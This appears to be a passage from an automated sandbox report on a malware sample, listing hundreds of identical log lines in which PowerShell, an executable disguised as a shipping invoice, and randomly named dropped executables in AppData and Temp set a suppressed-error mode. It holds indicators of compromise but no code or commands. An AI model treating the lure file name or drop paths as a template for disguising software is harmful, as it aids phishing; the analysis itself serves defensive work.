Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
